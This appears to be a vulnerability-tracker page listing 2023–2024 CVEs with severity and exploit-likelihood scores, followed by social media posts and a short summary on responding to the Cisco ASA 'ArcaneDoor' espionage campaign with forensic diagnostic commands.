| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2024-20358 | 6.7 | 0.04% | 12 | 0 | 2024-04-30T14:47:57.753000 | A vulnerability in the Cisco Adaptive Security Appliance (ASA) restore functiona | |
| CVE-2024-27322 | 8.8 | 0.04% | 8 | 0 | 2024-04-29T21:30:34 | Deserialization of untrusted data can occur in the R statistical programming lan | |
| CVE-2024-27956 | 9.9 | 0.05% | 1 | 1 | template | 2024-04-29T09:31:52 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti |
| CVE-2024-28076 | 7.0 | 0.07% | 2 | 0 | 2024-04-29T05:02:34 | The SolarWinds Platform was susceptible to a Arbitrary Open Redirection Vulnerab | |
| CVE-2024-2961 | None | 0.04% | 28 | 1 | 2024-04-29T05:02:33 | The iconv() function in the GNU C Library versions 2.39 and older may overflow t | |
| CVE-2024-3847 | None | 0.04% | 2 | 0 | 2024-04-28T06:31:27 | Insufficient policy enforcement in WebUI in Google Chrome prior to 124.0.6367.60 | |
| CVE-2024-3846 | None | 0.04% | 2 | 0 | 2024-04-28T06:31:27 | Inappropriate implementation in Prompts in Google Chrome prior to 124.0.6367.60 | |
| CVE-2024-3914 | None | 0.05% | 2 | 0 | 2024-04-28T06:31:27 | Use after free in V8 in Google Chrome prior to 124.0.6367.60 allowed a remote at | |
| CVE-2024-3845 | None | 0.04% | 2 | 0 | 2024-04-28T06:31:27 | Inappropriate implementation in Networks in Google Chrome prior to 124.0.6367.60 | |
| CVE-2024-3843 | None | 0.04% | 2 | 0 | 2024-04-28T06:31:27 | Insufficient data validation in Downloads in Google Chrome prior to 124.0.6367.6 | |
| CVE-2024-3834 | 8.8 | 0.08% | 2 | 0 | 2024-04-28T06:31:26 | Use after free in Downloads in Google Chrome prior to 124.0.6367.60 allowed a re | |
| CVE-2024-3837 | 8.8 | 0.08% | 2 | 0 | 2024-04-28T06:31:26 | Use after free in QUIC in Google Chrome prior to 124.0.6367.60 allowed a remote | |
| CVE-2024-3840 | None | 0.04% | 2 | 0 | 2024-04-28T06:31:26 | Insufficient policy enforcement in Site Isolation in Google Chrome prior to 124. | |
| CVE-2024-3833 | None | 0.04% | 2 | 0 | 2024-04-28T06:31:26 | Object corruption in WebAssembly in Google Chrome prior to 124.0.6367.60 allowed | |
| CVE-2024-3841 | None | 0.04% | 2 | 0 | 2024-04-28T06:31:26 | Insufficient data validation in Browser Switcher in Google Chrome prior to 124.0 | |
| CVE-2024-3839 | 6.5 | 0.08% | 2 | 0 | 2024-04-28T06:31:26 | Out of bounds read in Fonts in Google Chrome prior to 124.0.6367.60 allowed a re | |
| CVE-2024-3844 | None | 0.04% | 2 | 0 | 2024-04-28T03:30:22 | Inappropriate implementation in Extensions in Google Chrome prior to 124.0.6367. | |
| CVE-2024-32764 | 9.9 | 0.04% | 2 | 0 | 2024-04-26T15:32:22.523000 | A missing authentication for critical function vulnerability has been reported t | |
| CVE-2024-32766 | 10.0 | 0.04% | 2 | 0 | 2024-04-26T15:32:22.523000 | An OS command injection vulnerability has been reported to affect several QNAP o | |
| CVE-2024-27124 | 7.5 | 0.04% | 2 | 0 | 2024-04-26T15:30:34 | An OS command injection vulnerability has been reported to affect several QNAP o | |
| CVE-2024-4040 | 10.0 | 1.60% | 54 | 7 | 2024-04-26T15:25:47.270000 | A server side template injection vulnerability in CrushFTP in all versions befor | |
| CVE-2024-20359 | 6.0 | 0.13% | 52 | 1 | 2024-04-26T15:25:02.773000 | A vulnerability in a legacy capability that allowed for the preloading of VPN cl | |
| CVE-2024-20353 | 8.6 | 0.23% | 50 | 1 | 2024-04-26T15:22:27.803000 | A vulnerability in the management and VPN web servers for Cisco Adaptive Securit | |
| CVE-2024-4006 | 4.3 | 0.04% | 4 | 0 | 2024-04-25T15:30:45 | An issue has been discovered in GitLab CE/EE affecting all versions starting fro | |
| CVE-2024-4024 | 7.3 | 0.04% | 4 | 0 | 2024-04-25T15:30:38 | An issue has been discovered in GitLab CE/EE affecting all versions starting fro | |
| CVE-2024-1347 | 4.3 | 0.04% | 4 | 0 | 2024-04-25T12:30:56 | An issue has been discovered in GitLab CE/EE affecting all versions before 16.9. | |
| CVE-2024-2829 | 7.5 | 0.04% | 4 | 0 | 2024-04-25T12:30:51 | An issue has been discovered in GitLab CE/EE affecting all versions starting fro | |
| CVE-2024-2434 | 8.5 | 0.04% | 4 | 0 | 2024-04-25T12:30:50 | An issue has been discovered in GitLab affecting all versions of GitLab CE/EE 1 | |
| CVE-2024-3177 | 2.7 | 0.04% | 2 | 1 | 2024-04-25T06:16:00.237000 | A security issue was discovered in Kubernetes where users may be able to launch | |
| CVE-2024-20295 | 8.8 | 0.04% | 2 | 0 | 2024-04-24T21:32:04 | A vulnerability in the CLI of the Cisco Integrated Management Controller (IMC) c | |
| CVE-2024-20356 | 8.7 | 0.04% | 11 | 1 | 2024-04-24T21:31:56 | A vulnerability in the web-based management interface of Cisco Integrated Manage | |
| CVE-2024-28848 | 8.8 | 0.04% | 1 | 0 | 2024-04-24T17:06:02 | ### SpEL Injection in `GET /api/v1/policies/validation/condition/ |
|
| CVE-2024-28847 | 8.8 | 0.04% | 1 | 0 | 2024-04-24T17:06:01 | ### SpEL Injection in `PUT /api/v1/events/subscriptions` (`GHSL-2023-251`) ***P | |
| CVE-2024-2957 | 0 | 0.04% | 2 | 0 | 2024-04-24T16:15:08.880000 | Rejected reason: **DUPLICATE*** Please use CVE-2024-1983 instead. | |
| CVE-2024-28253 | 9.4 | 0.04% | 1 | 0 | 2024-04-24T14:34:35 | ### SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`) **Please note, o | |
| CVE-2024-3400 | 10.0 | 95.36% | 84 | 33 | template | 2024-04-23T19:57:25.207000 | A command injection as a result of arbitrary file creation vulnerability in the |
| CVE-2024-3832 | None | 0.04% | 2 | 0 | 2024-04-23T18:30:39 | Object corruption in V8 in Google Chrome prior to 124.0.6367.60 allowed a remote | |
| CVE-2024-3838 | 5.5 | 0.05% | 2 | 0 | 2024-04-23T18:30:39 | Inappropriate implementation in Autofill in Google Chrome prior to 124.0.6367.60 | |
| CVE-2024-29003 | 7.5 | 0.04% | 1 | 0 | 2024-04-23T15:30:35 | The SolarWinds Platform was susceptible to a XSS vulnerability that affects the | |
| CVE-2024-1480 | 7.5 | 0.04% | 8 | 0 | 2024-04-20T00:31:58 | Unitronics Vision Standard line of controllers allow the Information Mode passwo | |
| CVE-2024-29991 | 5.0 | 0.06% | 4 | 0 | 2024-04-19T18:31:16 | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | |
| CVE-2024-29204 | 9.8 | 0.04% | 5 | 0 | 2024-04-19T13:10:25.637000 | A Heap Overflow vulnerability in WLAvalancheService component of Ivanti Avalanch | |
| CVE-2024-27984 | 7.1 | 0.07% | 2 | 0 | 2024-04-19T13:10:25.637000 | A Path Traversal vulnerability in web component of Ivanti Avalanche before 6.4.3 | |
| CVE-2024-28185 | 10.0 | 0.04% | 2 | 0 | 2024-04-18T18:25:55.267000 | Judge0 is an open-source online code execution system. The application does not | |
| CVE-2024-29001 | 7.5 | 0.04% | 1 | 0 | 2024-04-18T09:30:53 | A SolarWinds Platform SWQL Injection Vulnerability was identified in the user in | |
| CVE-2024-28073 | 8.5 | 0.04% | 1 | 0 | 2024-04-17T18:31:37 | SolarWinds Serv-U was found to be susceptible to a Directory Traversal Remote Co | |
| CVE-2024-22354 | 7.0 | 0.04% | 2 | 0 | 2024-04-17T12:48:07.510000 | IBM WebSphere Application Server 8.5, 9.0 and IBM WebSphere Application Server | |
| CVE-2024-21111 | 7.8 | 0.04% | 4 | 1 | 2024-04-17T12:48:07.510000 | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (comp | |
| CVE-2024-31497 | None | 0.05% | 11 | 2 | 2024-04-17T00:31:29 | In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an | |
| CVE-2024-2279 | 8.7 | 0.04% | 2 | 0 | 2024-04-12T03:30:44 | An issue has been discovered in GitLab CE/EE affecting all versions starting fro | |
| CVE-2024-21338 | 7.8 | 0.11% | 2 | 3 | 2024-04-11T21:30:45 | Windows Kernel Elevation of Privilege Vulnerability | |
| CVE-2024-20697 | 7.3 | 0.06% | 3 | 0 | 2024-04-11T21:30:44 | Windows Libarchive Remote Code Execution Vulnerability | |
| CVE-2023-41266 | 8.2 | 85.11% | 2 | 1 | template | 2024-04-11T21:06:16 | A path traversal vulnerability found in Qlik Sense Enterprise for Windows for ve |
| CVE-2024-26198 | 8.8 | 0.53% | 2 | 0 | 2024-04-11T20:15:35.127000 | Microsoft Exchange Server Remote Code Execution Vulnerability | |
| CVE-2024-28913 | 8.8 | 0.09% | 2 | 0 | 2024-04-10T13:24:00.070000 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28908 | 8.8 | 0.09% | 2 | 0 | 2024-04-10T13:24:00.070000 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-29046 | 8.8 | 0.09% | 2 | 0 | 2024-04-10T13:24:00.070000 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28914 | 8.8 | 0.09% | 2 | 0 | 2024-04-10T13:24:00.070000 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-29982 | 8.8 | 0.09% | 2 | 0 | 2024-04-10T13:24:00.070000 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28933 | 8.8 | 0.09% | 2 | 0 | 2024-04-10T13:24:00.070000 | Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28937 | 8.8 | 0.09% | 2 | 0 | 2024-04-10T13:24:00.070000 | Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28911 | 8.8 | 0.09% | 2 | 0 | 2024-04-10T13:24:00.070000 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28942 | 8.8 | 0.04% | 2 | 0 | 2024-04-09T18:30:37 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28943 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:37 | Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-29984 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:37 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-29044 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:37 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28945 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:37 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-29048 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:37 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-29056 | 4.3 | 0.07% | 2 | 0 | 2024-04-09T18:30:36 | Windows Authentication Elevation of Privilege Vulnerability | |
| CVE-2024-28932 | 8.8 | 0.04% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28941 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28940 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-29045 | 7.5 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28935 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28936 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28939 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-29047 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28934 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28930 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28910 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28944 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-29983 | 8.8 | 0.04% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28931 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-29043 | 8.8 | 0.04% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28926 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28927 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28938 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:36 | Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-26218 | 7.8 | 0.04% | 6 | 1 | 2024-04-09T18:30:35 | Windows Kernel Elevation of Privilege Vulnerability | |
| CVE-2024-26248 | 7.5 | 0.05% | 2 | 0 | 2024-04-09T18:30:35 | Windows Kerberos Elevation of Privilege Vulnerability | |
| CVE-2024-28912 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:35 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28909 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:35 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28906 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:35 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-29985 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:28 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28915 | 8.8 | 0.04% | 2 | 0 | 2024-04-09T18:30:27 | Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-28929 | 8.8 | 0.09% | 2 | 0 | 2024-04-09T18:30:27 | Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |
| CVE-2024-3273 | 7.3 | 83.36% | 4 | 8 | template | 2024-04-07T15:30:32 | A vulnerability, which was classified as critical, was found in D-Link DNS-320L, |
| CVE-2024-1086 | 7.8 | 0.04% | 2 | 3 | 2024-04-06T05:01:36 | A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables compon | |
| CVE-2024-3272 | 9.8 | 1.27% | 2 | 1 | 2024-04-05T06:30:47 | ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very cr | |
| CVE-2023-41265 | 9.6 | 87.59% | 2 | 1 | template | 2024-04-04T07:16:03 | An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windo |
| CVE-2023-38831 | 7.8 | 44.37% | 6 | 43 | 2024-04-04T07:09:58 | RARLabs WinRAR before 6.23 allows attackers to execute arbitrary code when a use | |
| CVE-2023-32054 | 7.3 | 0.04% | 2 | 0 | 2024-04-04T05:57:40 | Volume Shadow Copy Elevation of Privilege Vulnerability | |
| CVE-2023-34362 | 9.8 | 95.55% | 2 | 9 | template | 2024-04-04T04:29:06 | In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0. |
| CVE-2024-22247 | 4.8 | 0.04% | 1 | 0 | 2024-04-02T18:31:17 | VMware SD-WAN Edge contains a missing authentication and protection mechanism vu | |
| CVE-2024-22248 | 7.1 | 0.04% | 1 | 0 | 2024-04-02T18:31:17 | VMware SD-WAN Orchestrator contains an open redirect vulnerability. A malicious | |
| CVE-2024-22246 | 7.4 | 0.04% | 1 | 0 | 2024-04-02T18:31:16 | VMware SD-WAN Edge contains an unauthenticated command injection vulnerability p | |
| CVE-2024-2389 | 10.0 | 0.44% | 17 | 25 | template | 2024-04-02T15:30:43 | In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command inj |
| CVE-2023-44487 | 5.3 | 73.93% | 2 | 12 | 2024-04-01T16:13:53 | ## HTTP/2 Rapid reset attack The HTTP/2 protocol allows clients to indicate to t | |
| CVE-2024-3128 | 2.4 | 0.04% | 1 | 0 | 2024-04-01T15:30:38 | ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problem | |
| CVE-2024-3094 | 10.0 | 10.08% | 8 | 60 | template | 2024-03-29T18:30:50 | Malicious code was discovered in the upstream tarballs of xz, starting with vers |
| CVE-2023-48788 | 9.8 | 56.22% | 4 | 1 | 2024-03-19T09:30:32 | A improper neutralization of special elements used in an sql command ('sql injec | |
| CVE-2023-48795 | 5.9 | 96.23% | 2 | 1 | template | 2024-03-14T21:48:10 | ### Summary Terrapin is a prefix truncation attack targeting the SSH protocol. |
| CVE-2024-27199 | 7.3 | 0.90% | 2 | 3 | template | 2024-03-11T15:15:47.663000 | In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limite |
| CVE-2024-27198 | 9.8 | 97.24% | 2 | 9 | template | 2024-03-11T15:15:47.483000 | In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform |
| CVE-2024-21901 | 4.7 | 0.04% | 2 | 0 | 2024-03-08T18:30:35 | A SQL injection vulnerability has been reported to affect myQNAPcloud. If exploi | |
| CVE-2024-21900 | 4.3 | 0.05% | 2 | 0 | 2024-03-08T18:30:35 | An injection vulnerability has been reported to affect several QNAP operating sy | |
| CVE-2024-21899 | 9.8 | 0.09% | 2 | 0 | 2024-03-08T18:30:35 | An improper authentication vulnerability has been reported to affect several QNA | |
| CVE-2024-1709 | 10.0 | 94.46% | 2 | 4 | template | 2024-03-01T05:06:28 | ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Byp |
| CVE-2024-1708 | 8.5 | 0.05% | 2 | 2 | 2024-02-22T15:30:39 | ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulner | |
| CVE-2024-1212 | 10.0 | 0.21% | 4 | 1 | template | 2024-02-21T18:31:06 | Unauthenticated remote attackers can access the system through the LoadMaster ma |
| CVE-2020-3259 | 7.5 | 1.93% | 2 | 0 | 2024-02-16T02:00:03.227000 | A vulnerability in the web services interface of Cisco Adaptive Security Applian | |
| CVE-2023-50386 | None | 87.24% | 2 | 1 | 2024-02-09T21:53:15 | Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of F | |
| CVE-2023-20198 | 10.0 | 87.33% | 2 | 28 | template | 2024-02-03T05:07:29 | Cisco is aware of active exploitation of a previously unknown vulnerability in t |
| CVE-2024-0204 | 9.8 | 53.86% | 2 | 6 | template | 2024-02-02T18:30:29 | Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauth |
| CVE-2023-46805 | 8.2 | 96.56% | 2 | 8 | template | 2024-01-31T05:07:17 | An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 2 |
| CVE-2024-21887 | 9.1 | 97.33% | 2 | 12 | template | 2024-01-22T18:31:16 | A command injection vulnerability in web components of Ivanti Connect Secure (9. |
| CVE-2023-22518 | 9.1 | 96.63% | 2 | 8 | template | 2023-12-28T05:05:44 | All versions of Confluence Data Center and Server are affected by this unexploit |
| CVE-2023-48365 | 9.6 | 0.08% | 2 | 0 | 2023-12-08T05:05:23 | Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthentica | |
| CVE-2023-4473 | 9.8 | 0.07% | 5 | 0 | 2023-12-06T03:30:26 | A command injection vulnerability in the web server of the Zyxel NAS326 firmware | |
| CVE-2023-4474 | 9.8 | 0.10% | 5 | 0 | 2023-12-06T03:30:26 | The improper neutralization of special elements in the WSGI server of the Zyxel | |
| CVE-2023-36396 | 7.8 | 0.11% | 2 | 0 | 2023-11-14T18:30:29 | Windows Compressed Folder Remote Code Execution Vulnerability | |
| CVE-2021-44228 | 10.0 | 97.56% | 2 | 100 | template | 2023-11-07T03:39:36.897000 | Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12 |
| CVE-2023-3094 | 6.3 | 0.06% | 2 | 3 | 2023-11-06T05:04:16 | A vulnerability classified as critical has been found in code-projects Agro-Scho | |
| CVE-2023-42793 | 9.8 | 97.10% | 2 | 7 | template | 2023-10-03T15:44:06.660000 | In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on T |
| CVE-2022-3602 | 9.8 | 6.08% | 4 | 12 | 2023-08-17T05:02:52 | A buffer overrun can be triggered in X.509 certificate verification, specificall | |
| CVE-2023-1389 | 8.8 | 6.88% | 3 | 2 | 2023-08-11T15:30:44 | TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 conta | |
| CVE-2023-24932 | 6.7 | 13.87% | 2 | 1 | 2023-05-15T18:18:30.897000 | Secure Boot Security Feature Bypass Vulnerability | |
| CVE-2023-21746 | 7.8 | 0.04% | 2 | 1 | 2023-05-06T05:00:40 | Windows NTLM Elevation of Privilege Vulnerability. | |
| CVE-2022-37955 | 7.8 | 0.06% | 2 | 0 | 2023-04-19T05:08:54 | Windows Group Policy Elevation of Privilege Vulnerability. | |
| CVE-2023-21036 | 5.5 | 0.04% | 1 | 6 | 2023-04-06T05:08:38 | In BitmapExport.java, there is a possible failure to truncate images due to a lo | |
| CVE-2014-0160 | 7.5 | 97.48% | 2 | 65 | 2023-02-18T05:04:47 | The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not p | |
| CVE-2022-38028 | 7.8 | 0.05% | 15 | 0 | 2023-02-03T05:02:37 | Windows Print Spooler Elevation of Privilege Vulnerability. | |
| CVE-2017-8570 | 7.8 | 97.34% | 6 | 9 | 2023-02-02T05:01:39 | Microsoft Office allows a remote code execution vulnerability due to the way tha | |
| CVE-2021-3129 | 9.8 | 97.46% | 2 | 28 | template | 2023-02-01T05:05:19 | Ignition before 2.5.2, as used in Laravel and other products, allows unauthentic |
| CVE-2006-4304 | None | 6.64% | 4 | 0 | 2023-02-01T05:01:22 | Buffer overflow in the sppp driver in FreeBSD 4.11 through 6.1, NetBSD 2.0 throu | |
| CVE-2021-21975 | None | 97.40% | 4 | 10 | template | 2023-01-29T05:07:01 | Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) |
| CVE-2021-26887 | 7.8 | 0.06% | 2 | 0 | 2023-01-29T05:06:49 | Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability | |
| CVE-2018-13379 | None | 97.41% | 4 | 12 | template | 2023-01-28T05:05:41 | An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal" |
| CVE-2021-26085 | 5.3 | 96.32% | 4 | 2 | template | 2023-01-27T05:03:06 | Affected versions of Atlassian Confluence Server allow remote attackers to view |
| CVE-2024-2782 | 0 | 0.00% | 8 | 0 | N/A | ||
| CVE-2024-28189 | 0 | 0.04% | 4 | 0 | N/A | ||
| CVE-2024-29021 | 0 | 0.04% | 4 | 0 | N/A | ||
| CVE-2024-4058 | 0 | 0.00% | 1 | 0 | N/A | ||
| CVE-2024-4059 | 0 | 0.00% | 1 | 0 | N/A | ||
| CVE-2024-4060 | 0 | 0.00% | 1 | 0 | N/A | ||
| CVE-2024-202358 | 0 | 0.00% | 4 | 0 | N/A | ||
| CVE-2023-3824 | 0 | 0.08% | 2 | 2 | N/A | ||
| CVE-2024-32462 | 0 | 0.04% | 6 | 0 | N/A | ||
| CVE-2024-202359 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2024-202353 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2024-27282 | 0 | 0.00% | 3 | 0 | N/A | ||
| CVE-2024-32657 | 0 | 0.04% | 2 | 0 | N/A | ||
| CVE-2023-42757 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2024-26132 | 0 | 0.04% | 1 | 0 | N/A | ||
| CVE-2024-26131 | 0 | 0.04% | 1 | 0 | N/A | ||
| CVE-2024-28254 | 0 | 0.05% | 1 | 0 | N/A | ||
| CVE-2024-28255 | 0 | 0.09% | 1 | 1 | template | N/A | |
| CVE-2024-20373 | 0 | 0.00% | 1 | 0 | N/A |
updated 2024-04-30T14:47:57.753000
12 posts
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-clicommand.- Use the
enablecommand to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show versionverify /SHA-512 system:memory/textdebug menu memory 8- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8? What does it do?
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-clicommand.- Use the
enablecommand to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show versionverify /SHA-512 system:memory/textdebug menu memory 8- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
Patching is not a fix!
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8? What does it do?
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
